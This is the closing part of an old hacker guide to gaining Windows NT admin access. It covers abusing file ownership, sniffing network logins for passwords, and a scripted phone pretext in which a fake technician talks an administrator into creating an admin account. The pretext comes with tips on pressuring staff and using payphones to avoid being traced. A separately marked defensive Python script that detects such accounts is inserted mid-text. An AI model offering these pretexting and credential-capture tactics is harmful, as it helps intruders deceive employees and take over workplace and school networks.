Ok, ok, this little exploit may not get you Admin but it can take advantage of the whole "ACL", so basically you can own files which don't actually belong to you! So if the Admin was really stupid!! they would place a copy of the SAM (the one which they made from the RDISK) into another directory (don't ask me why; I said if they were stupid) and that's where you will pick it up with your new toy :)

So basically use Setowner or Revoke etc. to poke around and 0wn other employees' files, and if you are really lame you can go up to their face and say...........

"y0 1'm a Hax0r and 1 jUsT 0wned ur Phile!" HAHAHHAHAHAH

Well anyway that’s if you are lame....... Let's move on..........


EXPLOIT 10 -SNIFFING

I will make this section short since sniffers are very advanced and I would have to write a whole guide on the subject. I will get straight to the point: as you know, a sniffer is used to monitor network traffic and debug bad CGI code or look for some form of bug in a server or network. However, they can also be used to catch hundreds of network passwords. How?

Well, if you think about it, a sniffer is recording and logging all the traffic which passes through the network, and that means when someone logs on to the network their user and pass would be logged as traffic. So if you arrived early at work and installed a sniffer and configured it correctly, all you have to do is wait and watch the packets of data get logged into the sniffer and bingo! You could end up having half of the network passwords, even the Administrator's! BUT it's not that easy, because sniffers aren't really that easy to set up and install, and some networks are configured totally differently to the sniffer, so the sniffer could end up sniffing just boring old traffic and not logging the traffic from the correct network adapter. Also, the fact is that you need to examine the logged data bits carefully, because you won't get something like this...

User: Michelle Trachtenberg

Password: Hackerzrock

You'll either get something like this.........

$%TFR&&HB124T**User:MichelleTrachtenberg*&*(PLH&Y
^^&&^^&&^T^TBBUUJNIUMJPass:Hackerzrule*((OI()I(I
*U*U*HHH ^T^&T^&^&^JU*I(*UU&*Y&Y&Y&TT^^&^&&^^^&^&^T^&
GET\cgijhyunHNYBYHYYHYHYHYHYHB^^&*&*&*(8788772817828127

Or if the sniffer is programmed to dump the logs in a Hex format it will look something like this......

00 0 00 0 0 00 0  0 02332  0 030303 0      .............................
098 77 66 55 4 3 3 2 4 3 34 4 5 4 3 3      .............................

(You would then need to convert this to Text)

In conclusion sniffers are very powerful and dangerous and if configured and set-up correctly, the Hacker could be rolling in passwords and personal email messages.

If you plan to actually get Administration privileges using a sniffer, my advice is to read as many text files on sniffers as possible, learn how the network is set up, then download a bunch of sniffers and experiment with them and see which one suits you; there are millions of sniffers out there and it's up to you to decide which one suits you. It's best to get a freeware one which has a nice GUI and has many features as well as being highly configurable. Well, that's all there is to say on sniffers, and remember you're only capable of hacking the system if you know how the system works.............


EXPLOIT 11 - SOCIAL ENGINEERING

As the final exploit in this guide I am going to end up talking about Social Engineering. What is social engineering? Well, the nice way to put it is pretending to be someone you're not, but the real way is basically bullshitting!

You have to pretend to be someone you're not; remember that. For example, I'm sure you have all heard of the legend Kevin Mitnick (the Super Hacker, some might say). Now don't get me wrong, because Mitnick was one of the best hackers and was very clever, BUT he was known as the "Master" of Social Engineering, so he spent a lot of his time getting to know people and tricking them into giving out secret information such as passwords and weaknesses in the system he wished to hack.

I've mentioned Kevin just in case you kiddies out there start thinking "Hahah, that will never work, no one is that dumb!" All I can say to that is "LOOK AT KEVIN MITNICK".........

Ok now for some social engineering examples.......

*NOTE: REMEMBER THESE NEVER REALLY HAPPENED, BUT THEY WORK.......

H = Hacker

MT = Michelle Trachtenberg (The receptionist at www.victim.com)

Picture the scene: you are calling from a payphone, Michelle Trachtenberg is at her reception desk and it is Monday morning.

The hacker has done his homework, so he knows a bit of info about the company.

Hacker dials number.........

RING , RING........... RING...... MT: Good morning, welcome to Victim, how may I help you?

H: Oh hello, I'm the Computer Technician. I was called late last night by your manager and he asked me if I could take a look at your Windows NT workstations, he says you're having trouble.........

MT: Ok can I have your name please?

H: Yes my name is Mike Jones

MT: And what company do you work for?

H: I work for the company XYZ Inc....

MT: What was the name of the manager who contacted you?

H: I don't mean to be rude, lady, but I have a lot of work to do today and I would greatly appreciate it if you would please put me through to your Administrator.

MT: Ok, ok I'm sorry but I need to ask these questions for security reasons, you must understand that?

H: Yes I do, but I'm sure you have a lot of work to do and don't really want to cause any trouble for me or your company, so please would you put me through to your Administrator.

MT: Ok. Please hold....

Michelle puts the call on hold and calls up the Administrator......

ADMIN: hello

MT: Oh hi Tom, A Mike Jones would like to talk to you.

ADMIN: Mike Jones?

MT: Yeah, he says he is a Computer Technician and was phoned late last night because you are having trouble down at the offices.

ADMIN: Mmmm, I don't recall any trouble, but lately the Email servers have been playing up so maybe that is why he was called. Put him through, Michelle.

MT: Ok

Michelle puts Hacker through..........

ADMIN: Hello?

H: Hello, I'm the Computer Technician. I was called late last night because you are having trouble with your workstations.

ADMIN: Oh hello, I wasn't actually expecting anyone since we haven't really had any trouble lately... But you can never be too safe. Heh, ok, what can I do for you?

H: Could you please create me an account and add me to the local Administrators group? If I'm going to take a look at your workstations, it's best I can view them inside out.

ADMIN: Sure, your user will be "Mike.J" and your Password will be...... "PcRePAIR".

H: Ok thanks

ADMIN: Give me 10 minutes to set up your account, and once you are done phone Michelle so you can talk to me and let me know what's wrong. I will then remove your account, ok? Have a nice day.

H: Heh, Sure will and yes I feel that this is going to be a very Good day...

HANGS UP PHONE AND NOW 0wns the network!

There you have it, and that is how easy it is to get Admin access by Social Engineering. Let's just go over a few basic skills....

  1. Sound professional, don't use slang.
  2. If the receptionist challenges you, use a firmer tone and complain about your heavy workday.
  3. Have a name and company ready, and even the name of a member of staff at Victim.com.
  4. If you are fucking up badly, hang up and run!
  5. Always use a payphone; you don't want to risk being traced.
  6. Be confident, don't hesitate.
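The other side of that phone call is the Administrator's problem, and it has a simple check. As an added example (not from the original guide), here is a Python script that reads account-management audit events and flags what Tom did above: a brand new account dropped straight into the local Administrators group, and a "temporary" admin account that is still there long after the 10 minutes he promised. The event records are constructed and simplified for the example (the real Security log has a different layout and a real job would read it from the machine); the event IDs are the NT4/2000 ones, with the later Windows numbers noted in the code, and the account names are taken from the dialogue.

```python
from datetime import datetime, timedelta

# Event IDs as logged by NT4/2000 security auditing. Vista and later use
# 4720 (created), 4726 (deleted), 4732 (added to local group), 4733 (removed).
USER_CREATED, USER_DELETED = 624, 630
GROUP_MEMBER_ADDED, GROUP_MEMBER_REMOVED = 636, 637

# Constructed, simplified audit records: (timestamp, event id, target account, group).
# This is NOT the real event log format; it only carries the fields the check needs.
EVENTS = [
    ("2001-05-14 09:12:03", 624, "Mike.J", None),               # Tom creates the account
    ("2001-05-14 09:12:40", 636, "Mike.J", "Administrators"),   # ...and makes it admin
    ("2001-05-14 09:30:11", 624, "svc-backup", None),
    ("2001-05-14 09:30:50", 636, "svc-backup", "Backup Operators"),
    ("2001-05-14 11:30:00", 636, "contractor", "Administrators"),
    ("2001-05-14 11:45:00", 637, "contractor", "Administrators"),  # cleaned up properly
]

def parse_time(stamp: str) -> datetime:
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")

def new_accounts_made_admin(events, within_minutes=10):
    """Accounts that were created and put in local Administrators within a few minutes.

    That pattern is the whole 'I'm the technician' trick in one line of the log.
    """
    created = {}
    flagged = []
    for stamp, eid, account, group in events:
        if eid == USER_CREATED:
            created[account] = parse_time(stamp)
        elif eid == GROUP_MEMBER_ADDED and group == "Administrators" and account in created:
            if parse_time(stamp) - created[account] <= timedelta(minutes=within_minutes):
                flagged.append(account)
    return flagged

def overdue_admins(events, now: datetime, max_minutes=60):
    """Accounts still in local Administrators at `now` for longer than the agreed window."""
    since = {}
    for stamp, eid, account, group in events:
        t = parse_time(stamp)
        if t > now:
            continue  # only what had happened by the time of the check
        if eid == GROUP_MEMBER_ADDED and group == "Administrators":
            since.setdefault(account, t)
        elif eid == GROUP_MEMBER_REMOVED and group == "Administrators":
            since.pop(account, None)
        elif eid == USER_DELETED:
            since.pop(account, None)  # deleting the account also ends its membership
    return sorted(a for a, t in since.items() if now - t > timedelta(minutes=max_minutes))

if __name__ == "__main__":
    now = parse_time("2001-05-14 12:00:00")
    print("created and promoted together:", new_accounts_made_admin(EVENTS))
    print("still admin past the window at", now, ":", overdue_admins(EVENTS, now))
```

Run on the constructed events, the first check names Mike.J (created and promoted 37 seconds apart) and the second still lists Mike.J at noon, while "contractor" is clean because the removal was actually done. The admin in the story never got the call-back, so the account would sit there until someone ran exactly this kind of check.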


FINAL WORDS

So there you have it, 11 ways to get Admin privileges on a Windows NT box (well, sort of Admin) when you have physical access to the machine. Personally I can't see these exploits working on places like the NAVY, ARMY, NSA etc., but they could help you get admin at places like high schools, universities etc. And to all the fellow Administrators out there, I warn you now: if you fall out with or give an employee a hard time you could end up regretting it and be looking at a massive pay loss. My advice to prevent this is pretty simple: "Have a good relationship with your fellow employees". New exploits for Windows NT are discovered all the time, so make sure you update your systems with the latest patches and hotfixes and you should be ok. I think you should try all these exploits (well, the ones you can) on your own system and see which ones get you Admin access, so that you know which patches you still need to apply.

Thanks for reading, and I hope you learnt something from this. If you are having trouble finding these exploits, just wait a couple of months and before you know it I will be releasing an "Exploit Pack" for Windows NT; it will contain all the exploits you have read about in this guide. Well, take care and have fun (or Phun, as the Hax0rs would say).

peace out and remember with great power comes great responsibility...

CREDITS

Konstantin Sobolev
The whole of Simple Nomad
Cra58cker
The whole of Cra58cker's Lab
Blazing Tools
Michelle Trachtenberg
NT Security
L0pht (now part of @Stake), makers of L0phtCrack
Dr -K
Astalavista security team
Petter Nordahl-Hagen
Rhino9 Team
HDC
Authors of Sechole.exe

Shout outs and Greetz

Greetz to all my fellow Hackers out there!

Fat Pulse
Cracker03
Virus1824
Ps69pher
Cense
Rizzy
All my fellow Totse members!
Hax0r
The LAN God
Lord Dredd (Are you still around?)
Mobman (Never met you, but you made the best Trojan ever!)
CdC (Never met you either, but you made the best Windows 9X and NT Trojan)
kM
Abhisek Datta
Ankit Fadia
@om (Atom)
J0n3sy
P0u1 (Paul)
Emz
Parma
Bdp702
Whole of the Tigertools team
And all the crazy bastards I left out!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

CONTACT

Feel free to contact me any time (I always reply back) to

[email protected]

Greetz, credits, Flames (I hope not!)

Or post a message at www.totse.com in the Hacking\Networking section :)

+Peace+

COMING SOON

Files -

Exploit Pack - All the Exploits for Windows NT

Cracked - All the SAM dump utilities

Text files -

"Hacker Michelle Trachtenberg"

"The ultimate Hackers Handbook to Hacking Windows NT"
